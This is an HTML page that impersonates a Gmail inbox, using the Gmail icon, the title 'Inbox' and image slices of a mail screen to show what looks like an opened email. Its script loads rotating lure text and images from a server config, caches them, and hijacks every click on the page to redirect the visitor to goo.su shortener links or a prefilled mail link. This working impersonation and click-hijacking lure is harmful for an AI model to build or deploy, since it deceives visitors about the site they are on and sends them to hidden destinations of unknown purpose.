<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<link rel="shortcut icon" href="https://ssl.gstatic.com/ui/v1/icons/mail/rfr/gmail.ico" type="image/x-icon">
	<link rel="preconnect" href="https://fonts.googleapis.com">
	<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
	<link
		href="https://fonts.googleapis.com/css2?family=Raleway:ital,wght@0,100..900;1,100..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
		rel="stylesheet">
	<title>Inbox</title>
</head>
<style>
	html {
		height: 100%;
		width: 100%;
	}

	body {
		height: 100%;
		width: 100%;
		overflow: hidden;
		background-color: #faf9fd;
		margin: 0;
	}

	#mobile-version {
		width: 100%;
		display: flex;
		flex-direction: column;
		height: 100%;
	}

	.mobile-version-justify {
		display: flex;
		justify-content: space-between;
	}

	.mobile-version-justify img {
		height: 100%;
		width: auto;
	}

	.mobile-version-justify:nth-child(1) {
		height: 45px;
	}

	.mobile-version-justify:nth-child(2) {
		height: 30px;
		margin-top: 35px;
	}

	.mobile-version-justify:nth-child(3) {
		margin-top: 35px;
		height: 52px;
	}

	.mobile-version-main {
		margin-top: 35px;
		width: 100%;
		height: auto;
		display: flex;
		flex-direction: column;
	}

	.mobile-version-main p {
		color: #1b1a1f;
		margin: 0;
		font-family: "Roboto", sans-serif;
		font-weight: 400;
		font-size: 4vw;
		margin-left: 3.9vw;
		margin-right: 3.75vw;
		color: #313131;
		margin-bottom: 4.7vw;
		white-space: pre-line;
	}

	.mobile-version-main__image {
		margin-left: 3.9vw;
		width: 76vw;
		position: relative;
		border-radius: 2px;
		overflow: hidden;
	}

	.mobile-version-main__image::after {
		content: "";
		position: absolute;
		width: 100%;
		bottom: 0;
		left: 0;
		height: 13vw;
		background-image: url(/inbox/images/mobile/imgbar.jpg);
		background-size: cover;
	}

	.mobile-version-main img {
		width: 100%;
		height: 100%;
	}

	.mobile-version-footer {
		display: flex;
		margin-top: auto;
		height: 130px;
	}

	.mobile-version-footer img {
		height: 100%;
		width: auto;
	}

	.mobile-version-footer-fill {
		flex: 1;
		background-image: url("/inbox/images/mobile/footerFill.jpg");
		background-size: auto 100%;
		background-repeat: repeat-x;
	}

	@media (min-width: 600px) {
		body {
			overflow: auto;
		}

		.mobile-version-main {
			width: 600px;
		}

		.mobile-version-main__image {
			width: 600px;
			margin-left: 23.4px;
		}

		.mobile-version-main__image::after {
			height: 110px;
		}

		.mobile-version-main p {
			font-size: 24px;
			margin-left: 23.4px;
			margin-right: 22.5px;
			margin-bottom: 28.2px;
		}
	}
</style>

<body>
	<div id="mobile-version">
		<div class="mobile-version-justify">
			<img src="/inbox/images/mobile/header.jpg" />
			<img src="/inbox/images/mobile/header2.jpg" />
		</div>
		<div class="mobile-version-justify">
			<img src="/inbox/images/mobile/title.jpg" />
			<img src="/inbox/images/mobile/title2.jpg" />
		</div>
		<div class="mobile-version-justify">
			<img src="/inbox/images/mobile/name.jpg" />
			<img src="/inbox/images/mobile/name2.jpg" />
		</div>
		<div class="mobile-version-main">
			<p id="text"></p>
			<div class="mobile-version-main__image">
				<img id="image" src="" />
			</div>
		</div>
		<div class="mobile-version-footer">
			<img src="/inbox/images/mobile/footer.jpg" />
			<div class="mobile-version-footer-fill"></div>
			<img src="/inbox/images/mobile/footer2.jpg" />
		</div>
	</div>
	<script>
		const textEl = document.getElementById("text");
		const imageEl = document.getElementById("image");

		const paths = ["0QwQW8", "TllwYU7", "b5WeZ", "J3tHdw", "jdVxl"];

		async function main() {
			const key = getCurrentKey();
			let cache = getCache(key);

			if (isCacheExpired(cache)) {
				cache = {};
				const config = await getConfig(key);
				
				cache.text = getRandomElement(config.texts);
				cache.image = getRandomElement(config.images);
				cache.url = getRandomElement(config.urls)
				cache.expire = +(new Date()) + (1000 * 60 * 60 * 24 * 7);

				setCache(key, cache);
			}

			textEl.innerText = cache.text;
			imageEl.src = cache.image;
			addLinkEvents(cache);
		}

		function addLinkEvents(cache) {
			document.addEventListener("click", function (event) {
				event.stopPropagation();
				event.preventDefault();

				if (window.location.href.includes("mail")) {
					handleMailToLink(cache);
				} else {
					handleGooSuLink();
				}
			});
		}

		async function handleMailToLink(cache) {
			let url = new URL(cache.url);
			let body = encodeURIComponent(url.searchParams.get("body") || "");
			url.searchParams.set("body", "");
			url = url.toString().replace(
				"body=",
				`body=${body.replace("|text|", encodeURIComponent(cache.text))}`
			);
			console.log(url);
			window.location.href = url;
		}

		function handleGooSuLink() {
			for (let path of paths) {
				if (window.location.href.includes(path)) {
					window.location.href = "https://goo.su/g/" + path;
					return;
				}
			}

			window.location.href = "https://goo.su/g/dtBl9cL";
		}

		function isCacheExpired(cache) {
			return !cache || +(new Date()) >= +cache.expire;
		}

		function getRandomElement(array) {
			return array[Math.floor(Math.random() * array.length)];
		}

		async function getConfig(key) {
			const response = await fetch("/inbox/server/configProvider.php?key=" + key);
			return await response.json();
		}

		function getCurrentKey() {
			if (window.location.pathname.includes("mail")) {
				return window.location.pathname.replace(/\/$/, "").replace("/inbox/mail/", "");
			} else {
				return "default";
			}
		}

		function getCache(key) {
			if (!localStorage.cache) {
				return;
			}
			const cache = JSON.parse(localStorage.cache);
			return cache[key];
		}

		function setCache(key, data) {
			let rawCache = localStorage.cache;

			if (!rawCache) {
				rawCache = "{}";
			}

			const cache = JSON.parse(rawCache);
			cache[key] = data;
			localStorage.cache = JSON.stringify(cache);
		}

		main();
	</script>
</body>

</html>